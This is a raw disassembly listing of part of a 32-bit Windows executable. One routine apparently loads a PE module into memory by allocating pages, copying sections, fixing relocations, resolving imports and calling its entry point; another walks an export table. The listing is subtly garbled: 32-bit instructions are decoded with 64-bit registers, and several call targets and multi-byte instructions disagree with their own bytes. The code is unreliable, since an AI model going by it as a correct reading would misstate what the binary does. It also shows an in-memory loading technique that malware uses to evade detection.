0040151a | ff 73 50 | PUSH | PUSH qword ptr [RBX + 0x50]
0040151d | ff 73 34 | PUSH | PUSH qword ptr [RBX + 0x34]
00401520 | ff d6 | CALL | CALL RSI
00401522 | 89 45 fc | MOV | MOV dword ptr [RBP + -0x4],EAX
00401525 | 85 c0 | TEST | TEST EAX,EAX
00401527 | 75 14 | JNZ | JNZ 0x0040153d
00401529 | 6a 04 | PUSH | PUSH 0x4
0040152b | 57 | PUSH | PUSH RDI
0040152c | ff 73 50 | PUSH | PUSH qword ptr [RBX + 0x50]
0040152f | 50 | PUSH | PUSH RAX
00401530 | ff d6 | CALL | CALL RSI
00401532 | 89 45 fc | MOV | MOV dword ptr [RBP + -0x4],EAX
00401535 | 85 c0 | TEST | TEST EAX,EAX
00401537 | 0f 84 b1 00 00 00 | JZ | JZ 0x004015ee
0040153d | 6a 14 | PUSH | PUSH 0x14
0040153f | 6a 00 | PUSH | PUSH 0x0
00401541 | ff 15 24 20 40 00 | CALL | CALL qword ptr [0x0080356b]
00401547 | 50 | PUSH | PUSH RAX
00401548 | ff 15 1c 20 40 00 | CALL | CALL qword ptr [0x0080356a]
0040154e | 8b f8 | MOV | MOV EDI,EAX
00401550 | 8b 45 fc | MOV | MOV EAX,dword ptr [RBP + -0x4]
00401553 | 6a 04 | PUSH | PUSH 0x4
00401555 | 33 c9 | XOR | XOR ECX,ECX
00401557 | 68 00 10 00 00 | PUSH | PUSH 0x1000
0040155c | 89 47 04 | MOV | MOV dword ptr [RDI + 0x4],EAX
0040155f | 89 4f 0c | MOV | MOV dword ptr [RDI + 0xc],ECX
00401562 | 89 4f 08 | MOV | MOV dword ptr [RDI + 0x8],ECX
00401565 | 89 4f 10 | MOV | MOV dword ptr [RDI + 0x10],ECX
00401568 | ff 73 50 | PUSH | PUSH qword ptr [RBX + 0x50]
0040156b | 50 | PUSH | PUSH RAX
0040156c | ff d6 | CALL | CALL RSI
0040156e | 6a 04 | PUSH | PUSH 0x4
00401570 | 68 00 10 00 00 | PUSH | PUSH 0x1000
00401575 | ff 73 54 | PUSH | PUSH qword ptr [RBX + 0x54]
00401578 | ff 75 fc | PUSH | PUSH qword ptr [RBP + -0x4]
0040157b | ff d6 | CALL | CALL RSI
0040157d | 8b 4b 54 | MOV | MOV ECX,dword ptr [RBX + 0x54]
00401580 | 8b 75 08 | MOV | MOV ESI,dword ptr [RBP + 0x8]
00401583 | 03 4e 3c | ADD | ADD ECX,dword ptr [RSI + 0x3c]
00401586 | 89 45 f8 | MOV | MOV dword ptr [RBP + -0x8],EAX
00401589 | 51 | PUSH | PUSH RCX
0040158a | 56 | PUSH | PUSH RSI
0040158b | 50 | PUSH | PUSH RAX
0040158c | e8 fb 02 00 00 | CALL | CALL 0x0040188c
00401591 | 8b 46 3c | MOV | MOV EAX,dword ptr [RSI + 0x3c]
00401594 | 03 45 f8 | ADD | ADD EAX,dword ptr [RBP + -0x8]
00401597 | 8b 4d fc | MOV | MOV ECX,dword ptr [RBP + -0x4]
0040159a | 57 | PUSH | PUSH RDI
0040159b | 53 | PUSH | PUSH RBX
0040159c | 89 07 | MOV | MOV dword ptr [RDI],EAX
0040159e | 56 | PUSH | PUSH RSI
0040159f | 89 48 34 | MOV | MOV dword ptr [RAX + 0x34],ECX
004015a2 | e8 2e fc ff ff | CALL | CALL 0x004011d5
004015a7 | 8b 75 fc | MOV | MOV ESI,dword ptr [RBP + -0x4]
004015aa | 8b c6 | MOV | MOV EAX,ESI
004015ac | 83 c4 18 | ADD | ADD ESP,0x18
004015af | 2b 43 34 | SUB | SUB EAX,dword ptr [RBX + 0x34]
004015b2 | 74 09 | JZ | JZ 0x004015bd
004015b4 | 50 | PUSH | PUSH RAX
004015b5 | 8b c7 | MOV | MOV EAX,EDI
004015b7 | e8 8d fd ff ff | CALL | CALL 0x00401349
004015bc | 59 | POP | POP RCX
004015bd | e8 02 fe ff ff | CALL | CALL 0x004013c4
004015c2 | 85 c0 | TEST | TEST EAX,EAX
004015c4 | 74 21 | JZ | JZ 0x004015e7
004015c6 | 57 | PUSH | PUSH RDI
004015c7 | e8 ad fc ff ff | CALL | CALL 0x00401279
004015cc | 8b 07 | MOV | MOV EAX,dword ptr [RDI]
004015ce | 8b 40 28 | MOV | MOV EAX,dword ptr [RAX + 0x28]
004015d1 | 59 | POP | POP RCX
004015d2 | 85 c0 | TEST | TEST EAX,EAX
004015d4 | 74 1f | JZ | JZ 0x004015f5
004015d6 | 03 c6 | ADD | ADD EAX,ESI
004015d8 | 74 0d | JZ | JZ 0x004015e7
004015da | 6a 00 | PUSH | PUSH 0x0
004015dc | 33 db | XOR | XOR EBX,EBX
004015de | 43 53 | PUSH | PUSH R11
004015e0 | 56 | PUSH | PUSH RSI
004015e1 | ff d0 | CALL | CALL RAX
004015e3 | 85 c0 | TEST | TEST EAX,EAX
004015e5 | 75 0b | JNZ | JNZ 0x004015f2
004015e7 | 8b f7 | MOV | MOV ESI,EDI
004015e9 | e8 9b 00 00 00 | CALL | CALL 0x00401689
004015ee | 33 c0 | XOR | XOR EAX,EAX
004015f0 | eb 05 | JMP | JMP 0x004015f7
004015f2 | 89 5f 10 | MOV | MOV dword ptr [RDI + 0x10],EBX
004015f5 | 8b c7 | MOV | MOV EAX,EDI
004015f7 | 5f | POP | POP RDI
004015f8 | 5e | POP | POP RSI
004015f9 | 5b | POP | POP RBX
004015fa | c9 | LEAVE | LEAVE
004015fb | c3 | RET | RET
004015fc | 55 | PUSH | PUSH RBP
004015fd | 8b ec | MOV | MOV EBP,ESP
004015ff | 51 | PUSH | PUSH RCX
00401600 | 51 | PUSH | PUSH RCX
00401601 | 8b 48 04 | MOV | MOV ECX,dword ptr [RAX + 0x4]
00401604 | 8b 00 | MOV | MOV EAX,dword ptr [RAX]
00401606 | 33 d2 | XOR | XOR EDX,EDX
00401608 | 53 | PUSH | PUSH RBX
00401609 | 57 | PUSH | PUSH RDI
0040160a | 89 4d f8 | MOV | MOV dword ptr [RBP + -0x8],ECX
0040160d | 39 50 7c | CMP | CMP dword ptr [RAX + 0x7c],EDX
00401610 | 75 04 | JNZ | JNZ 0x00401616
00401612 | 33 c0 | XOR | XOR EAX,EAX
00401614 | eb 26 | JMP | JMP 0x0040163c
00401616 | 56 | PUSH | PUSH RSI
00401617 | 8b 70 78 | MOV | MOV ESI,dword ptr [RAX + 0x78]
0040161a | 03 f1 | ADD | ADD ESI,ECX
0040161c | 8b 46 18 | MOV | MOV EAX,dword ptr [RSI + 0x18]
0040161f | 3b c2 | CMP | CMP EAX,EDX
00401621 | 74 16 | JZ | JZ 0x00401639
00401623 | 39 56 14 | CMP | CMP dword ptr [RSI + 0x14],EDX
00401626 | 74 11 | JZ | JZ 0x00401639
00401628 | 8b 7e 20 | MOV | MOV EDI,dword ptr [RSI + 0x20]
0040162b | 8b 5e 24 | MOV | MOV EBX,dword ptr [RSI + 0x24]
0040162e | 03 f9 | ADD | ADD EDI,ECX
00401630 | 03 d9 | ADD | ADD EBX,ECX
00401632 | 89 55 fc | MOV | MOV dword ptr [RBP + -0x4],EDX
00401635 | 3b c2 | CMP | CMP EAX,EDX
00401637 | 77 0a | JA | JA 0x00401643
00401639 | 33 c0 | XOR | XOR EAX,EAX
0040163b | 5e | POP | POP RSI
0040163c | 5f | POP | POP RDI
0040163d | 5b | POP | POP RBX
0040163e | c9 | LEAVE | LEAVE
0040163f | c3 | RET | RET
00401640 | 8b 4d f8 | MOV | MOV ECX,dword ptr [RBP + -0x8]
00401643 | 8b 07 | MOV | MOV EAX,dword ptr [RDI]
00401645 | 03 c1 | ADD | ADD EAX,ECX
00401647 | 50 | PUSH | PUSH RAX
00401648 | 68 b4 20 40 00 | PUSH | PUSH 0x4020b4
0040164d | ff 15 3c 20 40 00 | CALL | CALL qword ptr [0x0080368f]
00401653 | 59 | POP | POP RCX
00401654 | 59 | POP | POP RCX
00401655 | 85 c0 | TEST | TEST EAX,EAX
00401657 | 74 13 | JZ | JZ 0x0040166c
00401659 | ff 45 fc | INC | INC dword ptr [RBP + -0x4]
0040165c | 8b 45 fc | MOV | MOV EAX,dword ptr [RBP + -0x4]
0040165f | 83 c7 04 | ADD | ADD EDI,0x4
00401662 | 83 c3 02 | ADD | ADD EBX,0x2
00401665 | 3b 46 18 | CMP | CMP EAX,dword ptr [RSI + 0x18]
00401668 | 72 d6 | JC | JC 0x00401640
0040166a | eb cd | JMP | JMP 0x00401639
0040166c | 0f b7 03 | MOVZX | MOVZX EAX,word ptr [RBX]
0040166f | 83 f8 ff | CMP | CMP EAX,-0x1
00401672 | 74 c5 | JZ | JZ 0x00401639
00401674 | 3b 46 14 | CMP | CMP EAX,dword ptr [RSI + 0x14]
00401677 | 77 c0 | JA | JA 0x00401639
00401679 | 8b 4e 1c | MOV | MOV ECX,dword ptr [RSI + 0x1c]
0040167c | 8d 04 81 | LEA | LEA EAX,[RCX + RAX*0x4]
0040167f | 8b 4d f8 | MOV | MOV ECX,dword ptr [RBP + -0x8]
00401682 | 8b 04 08 | MOV | MOV EAX,dword ptr [RAX + RCX*0x1]
00401685 | 03 c1 | ADD | ADD EAX,ECX
00401687 | eb b2 | JMP | JMP 0x0040163b
00401689 | 53 | PUSH | PUSH RBX
0040168a | 33 db | XOR | XOR EBX,EBX
0040168c | 3b f3 | CMP | CMP ESI,EBX
0040168e | 74 6b | JZ | JZ 0x004016fb
00401690 | 39 5e 10 | CMP | CMP dword ptr [RSI + 0x10],EBX
00401693 | 74 12 | JZ | JZ 0x004016a7
00401695 | 8b 0e | MOV | MOV ECX,dword ptr [RSI]
00401697 | 8b 46 04 | MOV | MOV EAX,dword ptr [RSI + 0x4]
0040169a | 8b 49 28 | MOV | MOV ECX,dword ptr [RCX + 0x28]
0040169d | 53 | PUSH | PUSH RBX
0040169e | 53 | PUSH | PUSH RBX
0040169f | 50 | PUSH | PUSH RAX
004016a0 | 03 c8 | ADD | ADD ECX,EAX
004016a2 | ff d1 | CALL | CALL RCX
004016a4 | 89 5e 10 | MOV | MOV dword ptr [RSI + 0x10],EBX
004016a7 | 39 5e 08 | CMP | CMP dword ptr [RSI + 0x8],EBX
004016aa | 74 2c | JZ | JZ 0x004016d8
004016ac | 57 | PUSH | PUSH RDI
004016ad | 33 ff | XOR | XOR EDI,EDI
004016af | 39 5e 0c | CMP | CMP dword ptr [RSI + 0xc],EBX
004016b2 | 7e 19 | JLE | JLE 0x004016cd
004016b4 | 8b 46 08 | MOV | MOV EAX,dword ptr [RSI + 0x8]
004016b7 | 8d 04 b8 | LEA | LEA EAX,[RAX + RDI*0x4]
004016ba | 83 38 ff | CMP | CMP dword ptr [RAX],-0x1
004016bd | 74 08 | JZ | JZ 0x004016c7
004016bf | ff 30 | PUSH | PUSH qword ptr [RAX]
004016c1 | ff 15 18 20 40 00 | CALL | CALL qword ptr [0x008036df]
004016c7 | 47 3b 7e 0c | CMP | CMP R15D,dword ptr [R14 + 0xc]
004016cb | 7c e7 | JL | JL 0x004016b4
004016cd | ff 76 08 | PUSH | PUSH qword ptr [RSI + 0x8]
004016d0 | ff 15 40 20 40 00 | CALL | CALL qword ptr [0x00803716]
004016d6 | 59 | POP | POP RCX
004016d7 | 5f | POP | POP RDI
004016d8 | 8b 46 04 | MOV | MOV EAX,dword ptr [RSI + 0x4]
004016db | 3b c3 | CMP | CMP EAX,EBX
004016dd | 74 0d | JZ | JZ 0x004016ec
004016df | 68 00 80 00 00 | PUSH | PUSH 0x8000
004016e4 | 53 | PUSH | PUSH RBX
004016e5 | 50 | PUSH | PUSH RAX
004016e6 | ff 15 20 20 40 00 | CALL | CALL qword ptr [0x0080370c]
004016ec | 56 | PUSH | PUSH RSI
004016ed | 53 | PUSH | PUSH RBX
004016ee | ff 15 24 20 40 00 | CALL | CALL qword ptr [0x00803718]
004016f4 | 50 | PUSH | PUSH RAX
004016f5 | ff 15 00 20 40 00 | CALL | CALL qword ptr [0x008036fb]
004016fb | 5b | POP | POP RBX
004016fc | c3 | RET | RET
004016fd | 55 | PUSH | PUSH RBP
004016fe | 8b ec | MOV | MOV EBP,ESP
00401700 | 6a ff | PUSH | PUSH -0x1
00401702 | 68 98 20 40 00 | PUSH | PUSH 0x402098
00401707 | 68 80 18 40 00 | PUSH | PUSH 0x401880
0040170c | 64 a1 00 00 00 00 50 64 89 25 | MOV | MOV EAX,FS:[0x2589645000000000]
00401716 | 00 00 | ADD | ADD byte ptr [RAX],AL
00401718 | 00 00 | ADD | ADD byte ptr [RAX],AL
0040171a | 83 ec 68 | SUB | SUB ESP,0x68
0040171d | 53 | PUSH | PUSH RBX
0040171e | 56 | PUSH | PUSH RSI
0040171f | 57 | PUSH | PUSH RDI
00401720 | 89 65 e8 | MOV | MOV dword ptr [RBP + -0x18],ESP
00401723 | 33 db | XOR | XOR EBX,EBX
00401725 | 89 5d fc | MOV | MOV dword ptr [RBP + -0x4],EBX
00401728 | 6a 02 | PUSH | PUSH 0x2
0040172a | ff 15 70 20 40 00 | CALL | CALL qword ptr [0x008037a0]
00401730 | 59 | POP | POP RCX
00401731 | 83 0d c0 30 40 00 ff | OR | OR dword ptr [0x008047f8],0xffffffff
00401738 | 83 0d c4 30 40 00 ff | OR | OR dword ptr [0x00804803],0xffffffff
0040173f | ff 15 6c 20 40 00 | CALL | CALL qword ptr [0x008037b1]
00401745 | 8b 0d bc 30 40 00 | MOV | MOV ECX,dword ptr [0x00804807]
0040174b | 89 08 | MOV | MOV dword ptr [RAX],ECX
0040174d | ff 15 68 20 40 00 | CALL | CALL qword ptr [0x008037bb]
00401753 | 8b 0d b8 30 40 00 | MOV | MOV ECX,dword ptr [0x00804811]
00401759 | 89 08 | MOV | MOV dword ptr [RAX],ECX
0040175b | a1 64 20 40 00 8b 00 a3 c8 | MOV | MOV EAX,[0xc8a3008b00402064]
00401764 | 30 40 00 | XOR | XOR byte ptr [RAX],AL
00401767 | e8 11 01 00 00 | CALL | CALL 0x0040187d
0040176c | 39 1d 10 30 40 00 | CMP | CMP dword ptr [0x00804782],EBX
00401772 | 75 0c | JNZ | JNZ 0x00401780
00401774 | 68 7a 18 40 00 | PUSH | PUSH 0x40187a
00401779 | ff 15 60 20 40 00 | CALL | CALL qword ptr [0x008037df]
0040177f | 59 | POP | POP RCX
00401780 | e8 e3 00 00 00 | CALL | CALL 0x00401868
00401785 | 68 0c 30 40 00 | PUSH | PUSH 0x40300c
0040178a | 68 08 30 40 00 | PUSH | PUSH 0x403008
0040178f | e8 ce 00 00 00 | CALL | CALL 0x00401862
00401794 | a1 b4 30 40 00 89 45 94 8d | MOV | MOV EAX,[0x8d944589004030b4]
0040179d | 45 94 | XCHG | XCHG EAX,R12D
0040179f | 50 | PUSH | PUSH RAX
004017a0 | ff 35 b0 30 40 00 | PUSH | PUSH qword ptr [0x00804856]
004017a6 | 8d 45 9c | LEA | LEA EAX,[RBP + -0x64]
004017a9 | 50 | PUSH | PUSH RAX
004017aa | 8d 45 90 | LEA | LEA EAX,[RBP + -0x70]
004017ad | 50 | PUSH | PUSH RAX
004017ae | 8d 45 a0 | LEA | LEA EAX,[RBP + -0x60]
004017b1 | 50 | PUSH | PUSH RAX
004017b2 | ff 15 58 20 40 00 | CALL | CALL qword ptr [0x00803810]
004017b8 | 68 04 30 40 00 | PUSH | PUSH 0x403004
004017bd | 68 00 30 40 00 | PUSH | PUSH 0x403000
004017c2 | e8 9b 00 00 00 | CALL | CALL 0x00401862
004017c7 | 83 c4 24 | ADD | ADD ESP,0x24
004017ca | a1 54 20 40 00 8b 30 89 75 | MOV | MOV EAX,[0x7589308b00402054]
004017d3 | 8c 80 3e 22 75 3a | MOV | MOV word ptr [RAX + 0x3a75223e],ES
004017d9 | 46 89 75 8c | MOV | MOV dword ptr [RBP + -0x74],R14D
004017dd | 8a 06 | MOV | MOV AL,byte ptr [RSI]
004017df | 3a c3 | CMP | CMP AL,BL
004017e1 | 74 04 | JZ | JZ 0x004017e7
004017e3 | 3c 22 | CMP | CMP AL,0x22
004017e5 | 75 f2 | JNZ | JNZ 0x004017d9
004017e7 | 80 3e 22 | CMP | CMP byte ptr [RSI],0x22
004017ea | 75 04 | JNZ | JNZ 0x004017f0
004017ec | 46 89 75 8c | MOV | MOV dword ptr [RBP + -0x74],R14D
004017f0 | 8a 06 | MOV | MOV AL,byte ptr [RSI]
004017f2 | 3a c3 | CMP | CMP AL,BL
004017f4 | 74 04 | JZ | JZ 0x004017fa
004017f6 | 3c 20 | CMP | CMP AL,0x20
004017f8 | 76 f2 | JBE | JBE 0x004017ec
004017fa | 89 5d d0 | MOV | MOV dword ptr [RBP + -0x30],EBX
004017fd | 8d 45 a4 | LEA | LEA EAX,[RBP + -0x5c]
00401800 | 50 | PUSH | PUSH RAX
00401801 | ff 15 08 20 40 00 | CALL | CALL qword ptr [0x0080380f]
00401807 | f6 45 d0 01 | TEST | TEST byte ptr [RBP + -0x30],0x1
0040180b | 74 11 | JZ | JZ 0x0040181e
0040180d | 0f b7 45 d4 | MOVZX | MOVZX EAX,word ptr [RBP + -0x2c]
00401811 | eb 0e | JMP | JMP 0x00401821
0040181e | 6a 0a | PUSH | PUSH 0xa
00401820 | 58 | POP | POP RAX
00401821 | 50 | PUSH | PUSH RAX
00401822 | 56 | PUSH | PUSH RSI
00401823 | 53 | PUSH | PUSH RBX
00401824 | 53 | PUSH | PUSH RBX
00401825 | ff 15 0c 20 40 00 | CALL | CALL qword ptr [0x00803837]
0040182b | 50 | PUSH | PUSH RAX
0040182c | e8 9a f9 ff ff | CALL | CALL 0x004011cb
00401831 | 89 45 98 | MOV | MOV dword ptr [RBP + -0x68],EAX
00401834 | 50 | PUSH | PUSH RAX
00401835 | ff 15 50 20 40 00 | CALL | CALL qword ptr [0x0080388b]
0040183b | 8b 45 ec | MOV | MOV EAX,dword ptr [RBP + -0x14]
0040183e | 8b 08 | MOV | MOV ECX,dword ptr [RAX]
00401840 | 8b 09 | MOV | MOV ECX,dword ptr [RCX]
00401842 | 89 4d 88 | MOV | MOV dword ptr [RBP + -0x78],ECX
00401845 | 50 | PUSH | PUSH RAX
00401846 | 51 | PUSH | PUSH RCX
00401847 | e8 10 00 00 00 | CALL | CALL 0x0040185c
0040184c | 59 | POP | POP RCX
0040184d | 59 | POP | POP RCX
0040184e | c3 | RET | RET
0040185c | ff 25 4c 20 40 00 | JMP | JMP qword ptr [0x008038ae]
00401862 | ff 25 5c 20 40 00 | JMP | JMP qword ptr [0x008038c4]
00401868 | 68 00 00 03 00 | PUSH | PUSH 0x30000
0040186d | 68 00 00 01 00 | PUSH | PUSH 0x10000
00401872 | e8 0f 00 00 00 | CALL | CALL 0x00401886
00401877 | 59 | POP | POP RCX
00401878 | 59 | POP | POP RCX
00401879 | c3 | RET | RET
0040187a | 33 c0 | XOR | XOR EAX,EAX
0040187c | c3 | RET | RET
0040187d | c3 | RET | RET
00401886 | ff 25 78 20 40 00 | JMP | JMP qword ptr [0x00803904]
0040188c | ff 25 30 20 40 00 | JMP | JMP qword ptr [0x008038c2]
00401892 | ff 25 48 20 40 00 | JMP | JMP qword ptr [0x008038e0]
004018a0 | 51 | PUSH | PUSH RCX
004018a1 | 3d 00 10 00 00 | CMP | CMP EAX,0x1000
004018a6 | 8d 4c 24 08 | LEA | LEA ECX,[RSP + 0x8]
004018aa | 72 14 | JC | JC 0x004018c0
004018ac | 81 e9 00 10 00 00 | SUB | SUB ECX,0x1000
004018b2 | 2d 00 10 00 00 | SUB | SUB EAX,0x1000
004018b7 | 85 01 | TEST | TEST dword ptr [RCX],EAX
004018b9 | 3d 00 10 00 00 | CMP | CMP EAX,0x1000
004018be | 73 ec | JNC | JNC 0x004018ac
004018c0 | 2b c8 | SUB | SUB ECX,EAX
004018c2 | 8b c4 | MOV | MOV EAX,ESP
004018c4 | 85 01 | TEST | TEST dword ptr [RCX],EAX
004018c6 | 8b e1 | MOV | MOV ESP,ECX
004018c8 | 8b 08 | MOV | MOV ECX,dword ptr [RAX]
004018ca | 8b 40 04 | MOV | MOV EAX,dword ptr [RAX + 0x4]
004018cd | 50 | PUSH | PUSH RAX
004018ce | 33 c0 | XOR | XOR EAX,EAX
004018d0 | 40 c3 | RET | RET
